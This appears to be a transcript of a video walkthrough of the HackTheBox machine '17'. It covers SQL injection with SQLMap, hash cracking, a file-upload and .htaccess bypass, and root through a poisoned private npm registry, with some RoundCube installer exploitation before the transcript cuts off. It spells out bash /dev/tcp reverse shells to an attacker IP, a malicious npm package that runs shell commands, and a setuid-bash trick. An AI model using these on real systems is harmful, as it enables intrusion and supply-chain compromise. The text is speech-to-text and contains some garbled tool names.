What's going on YouTube? This is Ffuf, and we're doing 17 from HackTheBox, and this box had a lot of steps. One could even joke it had 17 steps in it. It starts out with finding a web app for a school system that's vulnerable to SQL injection. You can SQLMap it and get access to the database, which links to other virtual hosts, another one for schools, and then RoundCube, which is an online mailer thing. Now, the other one related to schools lets you upload files. There's some protections in to try to prevent you from executing code. But there's two unintended ways to get code execution that we'll dive into because it makes this box a lot easier. The intended path is just use the file upload, don't execute code on that web app. Instead, go to RoundCube and find a file inclusion vulnerability, guess the path of your file upload, and get a shell that way. And then once you get on the box, it's all about exploiting a local NPM registry that's running on the box, but we'll get into that at the end of the video, so let's just jump in. As always, we're going to start with an nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it 17, and then the IP address of 10.10.11.165. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, and it's running on an Ubuntu server, and we also get the specific version of Ubuntu that's for Ubuntu 0.7, which if we throw it into Google and go to Launchpad, it's going to tell us this is Ubuntu Bionic, which is Ubuntu 18. And this is going to be relevant near the end of the video. I know because it's relevant for the privask, you could just check it by looking at like Etsy LSB release. Also, linps will tell you. But once you get into the command line, you're like flooded with information and can completely miss exactly what distro it is. And right now, this is the early state of recon. You don't have that much information. So I think it's important to note it is Ubuntu 18, and we'll get more into that a bit later. The next port we have is HTTP on port 80, and it's running Apache, also leaks its Ubuntu and the exact version, which would point back to, well, that's weird. I'm noticing Apache versions differ, 2429 and 2438. They're both leaking Ubuntu. So right now, I'm guessing there's some type of weird routing at play. Maybe Docker or some virtualization, because having 2 different versions of Apache installed is really bizarre. So yeah, we have a web server on port 80 and 8000. And also, the one on 8000 is running Debian, so probably going to be Docker. Let's go take a look at the website. So 10.10.11.165. Copy this so we can go to both. And we just get forbidden as nmap had told us on this one. And on this page, we get looks like a static website that just has information. So I'm going to check if this is truly static. So the first thing I'm going to do is like index.php to see if I can find exactly what the file is. And seeing index.html, I know this is probably static. Just a standard bootstrap page that doesn't have any dynamic content. If like /index worked, I would be guessing it's some type of framework, maybe Laravel, Django, Flask, things like that. But just saying index.html, it's not really cluing me in on anything to do any type of attacks. Maybe a Go Buster to find hidden files or directories. Looking at the top of the page, we do see it leaking 17.htb, which is a host name. So let's add this into our host file. So sudo vi etc host 10.10.11.165. Put this in, and we can check 17.htb. And we get the same exact page, so nothing new there. We can look at the source code of the page to see if there's anything odd that would link to the thing that's being used. I'm guessing it's some type of static site builder. I'm drawing a blank on some examples, but I don't really see anything that interesting. We do have 2 links. It looks like Kabishkan, or however you pronounce that name. And if we looked at the page, I'm guessing the GitHub link and up here, this is where they get posted to. So I'm going to check them out to see if there's any source code that hints what this is. And I'm guessing this is just going to be the creator of the box, because this is very security related with the ROT buffer overflow evil twin attack. So I'm guessing this is just advertisement for his own social media type things. So I'm not going to spend too much time there. We could run a GoBuster to try to find hidden files, or virtual host enumeration because we do have a domain name. I'm going to do the vhost enumeration first because, spoiler, I've solved the box before and don't want to waste time just running a bunch of recon that doesn't end up anywhere. So for that, I'm going to use Ffuf. And I'm using Ffuf because I want to show something I learned recently. Generally, I would use like GoBuster, vhost enumeration, things like that. But you can do Ffuf just as well. So the URL 10.10.11.165. The word list we'll use is opseclist, discovery, DNS, subdomains top 5,000. And then we have to specify the header for host, fuzz.17.htb. And then hit enter once. It is defaulted to 533 lines. So I'm going to do FL for filter lines, 533. And we're going to see only one thing comes back, and that is exam. And one of the things that always puzzled me is I consistently got different results from Ffuf and Wfuzz. And that's why I always defaulted to Wfuzz because I was too lazy to figure it out. But it's right in front of me. Let's just run that same exact command with Wfuzz. And we'll have to change one thing because Wfuzz, instead of using the word filter, they use the word hide, right? So we can do Wfuzz and change this filter lines for HL for hide lines. What? Wfuzz u host. Is there a different number of lines being reported? 532. Okay. So that's another difference. I'm guessing _maybe Ffuf trims the very last line break. I don't know. But running this, we will get gc._mscds. So we're getting other results than just exam with the same exact word list. And the reason for that is this matcher in Ffuf. So if we look at Ffuf's help and go up to the match, we see it defaults to a few status codes, right? So when I run this, even though I didn't specify any match, it's only going to match on the status codes. So if you want to match on all, so it replicates Wfuzz's behavior, you have to do MC for match code, and then just specify all, and now it will display everything that Wfuzz does. So there's just one gotcha that's got me a lot of times, especially when like fuzzing APIs with Ffuf that use a lot of weird status codes. Things just don't show up. So always like take this into mind when using Ffuf. So with that being said, let's take a look at the actual domain. So let's add exam.17.htb to our host file. And go back to Firefox and exam.17.htb. And we get a examination review system. And the oddest thing is the use of Comic Sans, because if you look at this application in depth, you'll realize it's not just custom coded for this box. So if we look at the page source, we see it's the exam reviewer management system, which I just said. So let's copy this and go over to Searchboy. And we find exploits for it, right? And it is SQL injection. We also have a RCE, but this is saying authenticated. We don't have any credentials yet. So let's just look at this, right? So searchboy-x and view the exploit. And the vulnerable URL is pointed here, 127.001/erms/parameter, I'm guessing is take exam. And ID is equal to 1. And it's saying it's a Boolean-based blind exploit. So for this, I'm going to use SQLMap because when you do Boolean-based blind, you can only extract like one character at a time, and it's a huge pain to do manually. So let's go and test this out by going back to the web page and seeing if there's a place to take exams. And the reason why I'm doing it this way, I'm guessing this is the ID, is because I always like passing the full request into SQLMap because that way it like keeps all the headers. If you just use like the -u option, then you risk the chance of like the user agent being set by SQLMap, and the default for that says it's SQLMap, which a lot of like WAFs will pick up on. And I don't see any way to take this exam, so maybe we will go back. So let's go back to Searchploit, and we want this, right? So let's copy this whole thing, go to the website, and not found. Maybe it's not ERMS. Okay, so here's this. I wonder if we do take exam 9999, we have unknown exam ID. So that got deleted. Oh, this is getting really annoying. I was going to demonstrate the Boolean-based blind, but based upon all the redirects, I'm getting annoyed, and we'll just copy it. So let's see, and we'll explain what happens. So for the Boolean-based blind, what it does is uses SQL injection, but either makes this a true or false statement. Let me see if I can show this real easily. So take exam ID equals 1, we get a 200 OK. Let's do all 9s. Still the same thing. Let's see, content length 7824, content length 2683. So we have a difference in the content length. So when one exam doesn't exist, it sends like 13,000 less bytes. So if we do a SQL injection, so or 1 equals 1 like this, right? We have to URL encode it. And let's see, maybe we put a comment. We get 2683 because 1 equals 1 is true, right? What if we do or 1 equals 2? We have that as still 20,000 bytes because this statement is correct, right? So if we put ID is equal to 2, we're at 35,000 bytes. Let's see. Okay. So maybe 2 was good. I put ID equals 999, 7824 bytes. So now we change this or 1 equals 1, and we get back to 20,000 bytes, right? So this is exactly how a Boolean-based thing will work, because it's taking the output and says if the first character of the output is equal to A, and then checks the size, sees it's not that, it goes, okay, the first level of the output is equal to B, and eventually it pieces together the whole SQL injection one character at a time by asking it questions, right? That's the Boolean-based blind. Huge pain in the butt to do. So the easiest way is SQLMap. So we take a query like this, and then we can just copy it to a file. And we want to specify this is 17. And I'll call this take exam.request. And then we can go over to our terminal and SQLMap-R take exam.request. And it told us the injection was in ID. So I'm going to do -p ID, and we can put it in batch mode, right? And it's going to tell us this is Boolean-based blind, right? So hopefully it does. It looks like it is telling it. It's going to check for a bunch of other things, because whenever you do like blind injection, it's always slow. So it wants to test for things that it can extract more data out, such as a union injection. Because if we can do a union, we don't have to ask it questions. We can just say, hey, give us data, right? So it believes it is union injectable, and it's going to try a bunch, and I'm going to see it fail. So I'm just going to speed up the video or jump ahead because we don't need to watch this go slowly. And there we have it. SQLMap is done, and we can tell it is only either Boolean-based or time-based. The only thing really worse than Boolean-based is time-based queries, because instead of just asking it yes or no question and it telling you, you're making it cause a delay. So instead of getting a response immediately, it takes seconds and is much slower. So it's going to default to the Boolean-based blind. And the very first thing I generally do whenever it's this type of injection is change my threads to 10 so it goes a bit quicker. And the first thing I want to check is my privileges. And the thing I'm looking for here is if I have the file privilege, which would let me extract files off the file system and potentially get like the configuration files, which could lead to a password. And we can see I am the MySQL user, and my only privilege is usage, not file, so I can't extract files. So the next thing I want to look at is what databases exist on the server, right? So I'm going to do the --dbs, and it's going to tell me all the databases. And if this was union injection, I may try just a dump and dump everything. But again, you can see how long it's taking to just tell me information schema. And like, there's 100 tables in that. So it would just take forever. I have to let this like run overnight. We can see the databases. We have SFMS, ERMS-DB, and RoundCube DB. I'm guessing the ERMS is going to be this exam review management system. I don't know what SFMS is. So my first thing is let's extract out of ERMS-DB. So -D for database, ERMS_DB, and then we do --tables to extract all these tables. So I'm just going to pause the video and speed it up because extracting this information is going to take a while. And out of these tables, the one that is most interesting to me is users, because that can contain passwords and things like that. So -t users --dump to see what information is in here. And just like always, I'm going to speed up the video so we don't just wait for this to happen. So right away, we can see something interesting, but I just hate how line wrapping looks in general. So I'm going to view it with less, with a --S to disable it. And now I don't like how it's just a table. So let's just go back to how it was. No good way to view this data, I guess. We see OldManagement. Actually, there is. If we open this up in, let's copy, and then open this up in Vim. And maybe if I replace commas with tabs, and now we do the less, is that going to be better? It is. No, it's not, but oh well. We got avatar, and the weird thing is this whole OldManagement thing. So if we think about where files are generally stored, it's probably going to be var www HTML, and then maybe the website, and then files avatar.png. So being .. I think this means like multiple virtual hosts are on this site, right? Because it's going out of its directory, going into a different virtual host, which may be called OldManagement. So let's take a look to see if this site exists. So sudo v etc host, and we can add old, let's just paste it so I don't typo it. And if you don't understand what I said there, we can explain it real quick. Var www, we got HTML, var www, ERMS, and then var www, OldManagement, right? So this is probably, in my mind, how the website is set up. And we have this exam review management system, and it's pulling, like, it says the avatar isn't in ERMS. It goes up one directory, which means it's at var www, and now specifying the name of the different website, which would be OldManagement. It's a hack that a lot of just bad website or web developers will use. So let's go to OldManagement 17.htb to see if this exists. And hitting enter here, we get a different site. It's the school file management system. And oddly enough, it directs us to port 8000. This is where we were getting the forbidden earlier. And this is probably a different virtual host. Remember, because when we hit port 8000, it was now a Debian host in our nmap scan. So something odd is going on here. It is SFMS. And if we look at the database, so let's go back to this weird directory in SQLMap. Let's see. SQLMap output, exam. I thought DBs would be somewhere here. Dump, ERMS-DB. Let's just do DBs. And then we look at the output. We have SFMS. In here, we have the school file management system. So let's dump this. And while we dump this, let's try cracking all the hashes that we have so far. So I'm going to run SQLMap. Whoops, SQLMap -r, take exam. We're going to switch the table. And we're going to do -- tables to see what tables are in here. And while that happens, I'm going to cat users.text. We're going to awk. The field separator will be tab. Shoot, I think I just do it like this. I've never used awk on tab, I think. Let's see. Does this work? Maybe we put it in double quotes. Single quotes? Is it capital F? It is. So now we can do field separator. We have two tables. So we have we have 3 tables, user, storage, and student. So I'm going to specify user. I wonder if I can do 2 tables with a comma. Let's do user and student. Doesn't look like we can do 2. So I'm just going to run it twice. Oh, wait, what? -t user. Oh, we have to add the -dump. Student. There we go. I think it's going to dump both. So now let's go and try to get the data we want out of this CSV file. So we want the name. Let's do less -s. So probably username. So 1, 2, 3, 4, 5, 6. And the password will be 5, I guess, right? So awk print 5, that's hashes. 6, that's usernames. Awesome. So let's do 6:5. And we have username, password. We can just copy these. And this looks like it's just MD5 sums. So I'm going to go to the Kraken, which looks like it may be offline. So I'm going to pause the video and power it up. Okay, so let's SSH to the Kraken, go into our hashcat folder, and then v hashes. I'll call this 17.md5, and we'll paste these in. So /hashcat. And then mode for MD5, I want to say is 0 off the top of my head. We'll just try this first. Hashes 17.md5, and we have to specify, I think --user, because we have username : the password. Opt, isn't it opt? Yeah, opt word list rocku.txt. And we can start trying to crack this, right? And we get no results. I could specify a rule file, so like rules inside pro, password pro is generally the first rule file I use, or maybe best64 to see if anything cracks then. We could also send it over to like CrackStation, but nothing cracks here, right? So we don't have any good results, but we are extracting a second database, and it looks like it is still cracking, and that's with my pause to boot up the server. So SQLMap can definitely take a while. So I'm going to pause the video again, and we're just going to wait for this one to extract all of the hashes. So now that this is done, we can copy where this is. If I cat this file, pretty much the same thing. This is the student file system, and you log in with student number. So I'm going to use that as the username. So stud_no. Let's do awk -f for field separator. This one is just a comma. And then print. This is going to be 4, I think. That looks like student number. And then we jump 2 ahead to get to the hash. So this will be 6. So we have more MD5s. So we can copy these, add them to our hash file, and put this. And we did SQLMap against 2 tables, right? So let's go up. This one cracked it to user.csv. So I'm just going to specify user.csv, And our awk is, I think, backwards. We want the first name and then the hash. So for 6. And is this the same ones that we had before? Let's see. FC8, that's the same. B5. So Mark's password looks different here. And Steve is different as well. So we can just try cracking these all again. I'll do it without the rule file because that does make it take a bit longer. We had 1 right away. So if I just do the -- show, we can see 31234's password is auto destruction. So let's log in. So 31234. And then log in with auto destruction. And while that goes, I'm going to specify the rules file to always run something in the background. And looking at this, we have a file upload form, and this is just running standard PHP, so a lot of times this is exploitable, right? So the first thing to figure out is how it's storing files. If I hover over this download link, we can see it's just download.php store ID equals 33. So if I click download, we can open this in Firefox, and we just see it's the 17 educational, it's a PDF, and it's talking about the mastermailer.17.htb, which if we went there is going to be RoundCube, and that's the intended way to exploit this box. We're going to go an unintended route because this is, you're just throwing a CVE, and I don't think you're learning that much. I'll cover RoundCube at the end of the video most likely, but we're going to keep going down this unintended route, right? So we have a file upload form, and if we look at exactly how this is downloaded, so I'm going to do users.csv, and then intercept, upload a file, and we can see the parameters it takes is going to be file name, and we give it users.csv and the contents of this, and we're also sending the student number, 31234, which is the students. So there's a few ways it could be storing this file. The easiest way to figure this out is probably downloading the source code, because this is an open source application, but the first place I'd actually check is the database because we can extract anything, right? So if we look at the tables here, we can see there are 3 tables, users, storage, and student. We already looked at user and student, so the only thing left is storage. So if we go back to our dump command and change that to storage, we can get the information out of that, and that's store ID, student num, file name, file type, and date uploaded. Unfortunately, we don't have the full path here, right? We're looking at the download. It sends only the store ID, which is 33, and this is the information the application has to give them the file. Now, there's one good thing we see here, or we don't see, and we don't see like blob, because they could store the files in the database, and if they do, all paths to code execution are pretty much dead, because include statements won't be able to include something out of a database. You'd have to find an eval statement in PHP code, and that's much, much more difficult to find. So there's both good and bad right now. And we have to figure out exactly how the files are stored based upon this information. Now, there's a few ways the developer could do that. Probably the most common by juniors would be like the student number, then dash the file name. And so example, like if I was 9001, it would be please subscribe.txt. If I can spell, like that would be the example. And the dangerous thing here is if they put a PHP extension, you may be able to execute code. The thing we have to test for here is if there's like a files directory or something like that. So we could go bust this, but just guessing /files, we get forbidden. And if we do file not found, so chances are files go here, right? So we could test with like 31324 -marksheet finals.pdf, right? And we get not found. So that's not how the developer is doing it. Now, another way to do it would be to do the student number as a directory, and then they could do the file name, right? So if they do student number, then /file name, And we can easily test for that by just doing files 31324. Is that the actual thing? 31234. Whoops. And we get forbidden. So we know this directory exists. So the last thing to do would just be, what is it? marksheet-finals.pdf. And we get to the PDF. So we know this is how the developer is doing it. We'll download the source code in just a minute. If I was writing the report on how to do this, my recommendation would probably be MD5 summing it, or using any type of hashing. You may want to recommend like SHA-256 hashes because people are averse to using MD5 hashes. But in this, you're not using it for security. You're just using it to get a random file name, right? And by just having a random file name, you no longer give them control over the extension, which is definitely good. The other thing that we'd want to do is make sure like PHP wrappers are disabled on the site, because if you store a file this way and they put something in a zip, they can still control the file name. That is in my Crime Stopper video. But the main thing here is preventing users from being able to guess another user's file, right? So how I would do that is I do recommend like do the MD5 call. We have date uploaded here. So I'd say put date uploaded. Then we can do the student number, and then maybe store ID as well, and then the file name. And I'd probably move store ID to the beginning for sake of explanation. And to explain the logic behind each of these pieces, I'd be using the date uploaded and the store ID. This would be like assault, right? All the purpose of this piece, if I can type, where is that? There it is. The purpose of that piece is just to make it random. So if you knew my student number was 9001 and I uploaded password.txt, you couldn't just make the MD5 sum of 9001 password.txt and guess my file, right? The purpose of student number is to prevent collisions, right? So if I upload password.txt and you upload password.txt, we don't want to overwrite each other's files. So that's the purpose of the student number there. And the file name is to make sure I don't overwrite my own files, right? That should be obvious. So that would be a more secure way to do it. You could also put it in the database, which is good, but can be taxing on the database, I guess. So let's look at the source code to see exactly how the developer did it, because it is open source and we have an excuse to review source code. So let's review source code. Let's go back a few times. And I'm going to Google School Management System, source code. And we get to this website called sourcecodestir.com. And if we scroll down, there is a download link. Download will start in a few seconds. Waiting for it to download. We have it here. So let's make a downloads directory and then move downloads. What is the file name? It is schoolmant file. So school file management system, unzip it. And I'm going to guess it's in savefile.php. So we can see a few things here. Number one, it's saying if the file exists files, then student number, then create it, and then move the file in there. So all this is doing is copying a file in a directory. Now this piece is a different unintended that we'll go into in a few minutes. But first, let's just try uploading a PHP file. So id.php, or we'll call this ip.php, I guess. And all we're going to do is run a system command like that. We can go all out and do a shell, I guess. Request shell like this. I think that's typed right. And let's upload this. So file, ip.php, add file. And now we know it's going to be in my student ID, which is, or it's going to be in files, ip.php, right? And we get forbidden. So if we tried other files, let's go back to the upload, browse, ip.php. Let's send this to Burp Suite so we can easily change text. And instead of ip.php, I'll do ip.php7. We'll do phtml. Var is another thing. Include. And just try all these files, right? So we can turn Burp Suite off so we can test this quickly. If you just Google like alternative PHP extensions, you'd find a long list. So files 3, 1, 2, 3, 4, ip.php, blocked, php7. We should probably view the source. We see it's just printing it, so it's not executing. ip.include, var. So all these extensions aren't getting executed, and PHP is getting forbidden. Now, in Apache, generally how you block a PHP script in one directory is a .htaccess file. So we can try just uploading a .htaccess and deleting the contents. Deleting the contents. And now when we go to ip.php, we get an error because system can't execute. And if we just do shell is equal to ID, now we can get code execution. So we uploaded a different copy of htaccess, which removed the file restriction. Now, there's a second way we could have done about this. And if we just go back to where we upload ip.php, if we change the student number to 9001 and upload it, fail to open stream. I wonder if I just clobbered something on the server. No such file. Let's go back a few. ip.php. If I try to upload this, okay, that's fine. Let's do 9001. That's fine. I'm guessing I screwed something up, but now we're back to that. If I go in here and say files 9001, we also get a shell because I believe the machine creator put that htaccess file there to stop code execution, not knowing that you could just create a new folder, and when you do, the application itself doesn't create that htaccess. So that's why earlier when I was explaining the different ways to save things, that having like all the user content go in a dynamically created directory is dangerous, because if someone says, oh, this is user created code, we should block it with an htaccess, they may be able to change where it writes to in a different directory, which then the htaccess isn't there and you bypass that. So that's why generally I just like MD5 summing it all and not letting the user ever control the extension because it limits the attack surface. Doesn't fully prevent it. Like I said before, if you watch my Crime Stoppers video, you'll find a way around that and some edge cases, but it's defense in depth, right? So let's get a shell here. I'm just going to send this over to Burp Suite. So let's clear a proxy, put in repeater, and I always like sending it in the post because the post has less bad characters than the get. And we can do --c, --i, dev tcp 10.10.14.8, 9001, 0 and 1 like that. We will URL encode this, nc lvnp 9001, send it, get the shell, and then python 3 -c import pty.spawn, bin bash. Python 3 not found. Is it script-q bash? Then stty raw -echo fg, then export term is equal to xterm. Maybe we have to run bash. There we go. So now we have a proper TTY where we have tab autocomplete and everything. It looks like we are in a Docker container just because of this host name. So let's just take a look at the actual web applications. Doing an ls, there's an HTML directory. Look here, and it looks like we have the 3 web servers: employee management, master mailer, and old management. So if I look at employee management system, the main thing we want to find is the configuration to extract all the potential passwords. So let's do ls grep config. Is there one? No. Let's see. Let's go in here. I'm just going to look at index. I guess that's an HTML file. Let's just head on, I guess, mark.php. Probably doesn't matter which one. The main thing I was looking for is this require once. And we have process dbh.php. I'm guessing this is the database configuration. We look at this. We have 2020 best year of my life. So that is one credential. And I'm going to add this into just pw.text on my Kraken. I'm going to create a custom word list just to see if there's any passwords here, right? So if I look at master mailer, and let's see, is there a config? There's a directory. And then config.inc.php. Let's see, grep-i password. Oh, there's a lot of passwords here. But it looks like it is right here, MySQL user, and then MySQL password. So we can copy this and add this one here. And then there is old management, and I'm guessing it's in DB. That's a SQL file. That's not it. Let's just head login.php and let's grep require out of login.php because it's got to load it somehow, right? Let's see, grep-i MySQL and all these files. Let's see. There's the MySQL queries. Let's see. Less index.php. No file less. I hate PHP files that mix in this. Let's see, cat login.php. This has to talk to the database, so it's got to be in here. Let's see. Or maybe it's in login query. There's no less. Login query.php. Finally, there's a directory called admin, and it's con.php. And we can see it's MySQL password, which I think is the password we already had. It is. So we only have 2 new passwords here. And if we do /, we probably have this in our history, right? So we can just change out the rocku.txt. And we called it pw.text to see if this gets any new cracks. Already finished. Let's just do --show. And we don't have any new passwords here. So there's no password reuse among the users in the database. If we look at passwd on this, we do have a user called Mark. So if we try, let's say shmark at 17.htb, accept it, there's auto destruction. Let's see. If I can type auto destruction, that's not a valid password. Let's copy the other password. It's 2020 best year of my life. So copy this, SSH. I don't know why it's not saving this host. I wonder if we have to log in for it to save. And we get SSH'd in. So I'm going to do an IP ADDR, and we see all these interfaces, which indicates we are on the host operating system. So we've escaped the Docker by SSHing in with some reused credentials. And now let's just take a look around this file system. Looks like there is user.txt, but everything else is pretty bare. This is interesting. We have a .npm directory. If I look into this, it is empty. So if we look back at the passwd file here, I'm going to grep for everything that ends in sh. And we can see 3 users, root, Kavi, and Mark. If I go to /home, we do see Kavi, but we can't get into his directory. We can look at the file system for every file owned by Kavi, so find /-user Kavi, and direct errors to dev null. And we probably should do a -ls as well, so we see the full permissions of it. We see home Kavi, not interesting. Interesting enough, we do have var mail Kavi, and everyone can read it. So let's cat var mail Kavi. And the key thing here is it's talking about some type of private registry, and they moved old logger and added log level. You just have to publish it to the registry and test it with the application. So if we look at all the listening ports on this box, there's a lot of them. A lot of these on 6,000. Interesting enough, there's nothing on 8,000. And that's because, I guess of something HackTheBox did. And they have 8,000 being a load balancer to all these 6,000 ports. And that's done via IP tables. I forget exactly what box showcased that. I think it was sync. So if you want an explanation of that, that would be in sync how to do that. But so 6,000 ports, if we just curl it, curl localhost 6008, you can see it goes to that Debian box, which is the same exact thing as if we had curled 17.htb port 8000. And you know it's going into the Docker because of that Debian, right? The one port that doesn't really make sense right now is this 4873. And if I curl it, we're going somewhere, right? So the easiest way is to just set up a port forward. So I'm going to do the squiggly C, and that's going to be the very first thing I type on a line. And that puts me in this SSH prompt. And we can do -L for local port forward, 4873, localhost 4873. So now if I go to my port 4873, it's going to go through the SSH session and take me to that port, right? So we can see easily it's an application called Verdaccio. I think that's how you pronounce it. And it's an NPM, registry, an NPM registry. So if we do npm-h, we can see options, I believe. And there is, let's see, there's a publish to publish it. There is a search option. It'd probably be easier if I just search it. So search. So if we did like npm search, and we can specify the registry as http localhost 4873. And this is going to search that registry for all of the packages on it. And registry is just another name for like package manager, think of it, right? So we can see the packages on this registry: big number.js, core util, db logger, log level. And the author of db logger is Kavi. And if we look back at that mail, they removed old logger and added log level instead. And if we look at the log level and then look at the other name that has log in it, I'm guessing this is going to be the old logger, the db-logger. So let's install this so we can download it from the registry. So I'm just going to go into a directory. We're going to run that npm command again, but this time I'm going to specify install, and we're going to install that package, db-logger. So this is going to connect to the registry, download db-logger and install it to my current working directory. So we go node modules, and then we can look at db-logger, and that's the package.json that explains it, and then the source code logger.js, and we can see it's creating a MySQL connection, root, the password is IHateMathematics123, and the database is logger. So we could now do MySQL -u root-p. I guess we can't log in. I figured we'd be able to. So it doesn't look like we can log into the database with those credentials. But Kavi is the creator of that. So if I ssh Kavi at 17.htb, yes, paste in the password, and we can SSH as Kavi. We could have also just done SU to test it to switch users and do it that way as well. But now we're Kavi on the system. Do it LSLA here. Looks pretty much the same. If we look at the sudoers list, we can see Kavi can run a application called startup.php. So let's take a look at this application. So it starts off with creating like a list object of 2 items, db logger and log level, loops through it, and then runs a npm-l grepping for the dependency. So the first one is going to look for db logger, the second one is going to look for log level, and then it's going to attempt to install it, change the owner, and then execute this node application. So my first thought is every binary here is using the full path, so there's no way to do any type of path injection. So the most logical thing is we have to poison the registry, right? So what is in my clipboard right now? Not the password I want. Let's see. It was in logger, because we want to do an npm login, right? To log into the registry. If we do Kavi, the password, did the whole directory get deleted already? Wow. Let's install it. Maybe there's a cron that's actually wiping out dev shm, which is odd, but oh well. So if I cat or go into, what is it, db logger, we can get this password to try to log in. Email, let's do Kavi at 17.htb. And we see the user registration is disabled. So we can't log in, which means we probably can't update this registry. Now remember at the beginning of the video, when I said it being on Ubuntu 18 is going to be important. And there's a lot of issues with Ubuntu up to this version. In version 19, they changed it, but the sudo, by default in Ubuntu 18 and before, will preserve the home directory variable. So if I did, let's do sudo-l, it saved my password already. If I did sudo opt app startup.sh, it's not actually pulling root's home directory to load things. So this, I wonder if that npm debug is a hint at that. Let's delete that file real quick. If I run this again, do a ls, I don't know where that npm debug file came from, but all the variable it's using is pulling from Kavi, not root, so we can edit this npmrc file to point to us for the registry. So instead of 127.0.0.1, I'm going to change this to 10.10.14.8, and we can exit this nclvnp 4873. So now when I run this sudo command, it should reach back to my box. But it didn't there. Let's see. Registry 10.10.14.8, 4873. Oh, I'm guessing it's because I had it installed. Let's go into a new directory where I am not. Run this again. And there we go. It says installing log level, and we see it's making the request back to my box. So what we have to do is stand up a registry on our box so it installs the malicious version of log level. And to do that, I'm going to run Docker. And I think I have Docker installed already. I do. So let's do sudo docker pull. How do we spell this? What is the name? Verdaccio. Like that, I think. So we can pull the latest version. And we can stop this for now. And now that we pulled the version, we want to run it locally. So we do a docker run -it to allocate a sudo tty --rm to delete this container when we're done. Then the port 4873, that's the port it listens on our host. We bind that to the port in the Docker. I'm just assuming Verdaccio's default port is 4873 because that's what it was on the HackTheBox machine. And then the image we pulled, and we can run this. And it looks like it has started up. So let us do a npm add user, because in order to push an image to it, we need to log in. So we can specify the registry as http 10.10.14.8 4873, username ipsec, password please subscribe, the email, let's just do any email, it doesn't matter, and it says we logged in. And what this did was write to our npmrc file, adding the auth token, so anytime we access the registry at 10.10.14.8 4873, we have an authentication token. And I don't know exactly how this is stored. Let's just see if this is random. Echo-n base64-d. Yeah, it looks like it's just a random token. So, not exactly sure how that stores, but that is not important. So now we can authenticate against the registry. We have to make the malicious package, right? So I'm going to make a package called log level, because I think that's what it is on the box. And we're just going to do npm init, and then the package name, log level, the version. It just has to be greater than what's on the target. So if I do npm install log level, it is, let's see, it's thinking, at least I think the package name is log level. It's at 180, so we can just do 181. And then the entry point is index.js. So all we have to do is create index.js, and we can put a malicious one-liner for node. So we require the child process, which if you're familiar with like Python, this is similar like import OS, I guess. And then we can execute a reverse shell. So bash-c, bash-i, dev tcp 10.10.14.8, 9001, 0 and 1 like that. And I want to say that's all we have to do. So now we can do npm publish registry http 10.10.14.8 4873. So we have written this package to our registry. So let's go back to our home, make sure the npm is pointed to us. So .npmrc, change this to 10.10.14.8. And I'm going to listen 9001 so we catch the reverse shell. That looks good. And now we can run that sudo command. And as soon as I got rid of the password, let's see, do we have it here? Yes, we do. Awesome. I was going to say, as soon as I got rid of the password, I needed it because it was in that other terminal pane, I think. But we have it there, so we can do sudo opt app startup.sh. It's checking for log level, installing it. We see it made the request to us. We have a connection here. Does not look like it actually worked though. I couldn't do ls. Let's see. Cat index.js. That looks like it should have worked. Let's just copy and paste this. That's fine. Weird. We definitely executed a command though. So what I'm going to do is change this to be a chmod 4755 temp shell. So we're going to create a setuid binary, and we'll copy bin bash to temp shell, package.json. Now we got to make this 182. And the one thing we forgot to do is we have to change the owner as well. So chown root temp shell. There we go. Now we can publish again. And let us run this. Checking for DB logger. And it's taking a while. I'm going to make sure my npmrc file is still pointed at me. It is not. 10, 14, 8. Run this. It's taking a while. Let's just go into a new directory. I'm not sure if this matters. I wonder if we hung this box or something. Okay, there we go. It just took a long time to identify DB loggers installed, but I don't see it hitting my server, so I'm guessing it's not actually installing anything. Let's see. Nope, there we go. It went to install. So let us see if temp shell is now owned by root. So temp shell. It is now owned by root, and it being complete red, I think that means it's setuid. So temp shell -p id. Effective UID is root. So cd/root. And now we can read root.txt. So I'm not exactly sure why my reverse shell did not work. I'm guessing there was a special character, a typo somewhere there, but now we have this working and got root on the box. So now we can go into the intended way to get a shell, which involved RoundCube and a CVE. So let's go into that. So let me just clean up my panes because at this point we did not have a shell on the box. And then go back to our web browser and go to where we could download files. And let's download the PDF and look at it. It's going to talk about master mailer. And this is the RoundCube instance that we had just completely skipped. But now let's just take a look at it real quick. So sudo vi etc host, add in mastermailer.htb, and now we can navigate there. And we get a RoundCube instance. If we don't know it's RoundCube based upon the logo, it is in the HTML source. But the main thing we want to do is figure out the version of RoundCube that is running. Now, the easiest way to do that always is just look at GitHub. So GitHub, search RoundCube, go to the source code and see exactly how this project is laid out. And they do have like install, license, makefile, changelog. So let's check something real quick. So if we go to RoundCube, master mailer, let's try install. And we have the install instructions, but nothing's indicating the version. So let's try changelog, and we get version 142. So now let's Google RoundCube 142 release notes. And we see it was probably released around January 1st, 2020, telling us this instance of RoundCube is very old. So now let's look for CVEs. If we go to the MITRE page, we see we can pick anything before like January 1st, 2022, I think, or 2020. 2020 it was. So from here and down, I believe. 3.5, 4.3, probably not RCE, so we don't care about it. The first two we get across is 12.641 and 12.640. If we looked into these, 12.641, I believe, requires emailing someone, so I'm just going to skip that one. I'm going to look at this CVE. So Googling that CVE, then GitHub. We can go to a page that has a proof of concept. And the hard thing about this is, in order to exploit this, two things have to happen. Number one, we have to have access to the installer. So if we go to the installer directory, looks like we do. So that is good. Generally, whenever you install software, you should always remove the installer directory because bad things always seem to happen with it. And then the second thing is we have to have a place where we can upload a PHP file and a folder. And in the OldManagement, we have a way to upload PHP files, but now we need a folder. So what I'm going to do is just cheat a little bit. We know there's the files path. You're supposed to find this out through viewing the source code, right? We downloaded that already. And if we put a directory that doesn't exist, we get not found. So we could have ran like GoBuster. And if we did, we discover there's a directory called papers in this folder. And because there's a directory called papers here, now we can upload papers.php and mimic the structure that, let's see, let me close that, the structure right here. So I'm going to move ip.php to papers.php, and let's just put a reverse shell here and hardcode the whole thing. So bash-c, bash-i, dev tcp 10.10.14.8, 9001, 0 and 1 like that. Close it all out. And we got our reverse shell, and this is what we want to upload. So let's go back to OldManagement. Right here, browse, upload papers.php, make sure intercept is on in both places, add the file. Just for this request, we'd actually need to intercept that, but papers.php exist. So now the next step we have to do is send this post request. And we'll have to edit the location because in this POC, they're assuming you have shell on the server and they just created this. But we don't have shell. So we have to put the path that we wrote to and kind of guess where it is because we didn't have any way to leak files. So let us go to the RoundCube installer. Where is it? Right here. And I'm just going to click that update config button so we get a skeleton of our post that we want. I'm going to delete this because we don't care about the parameters because we just want to send the parameters of the POC. And of 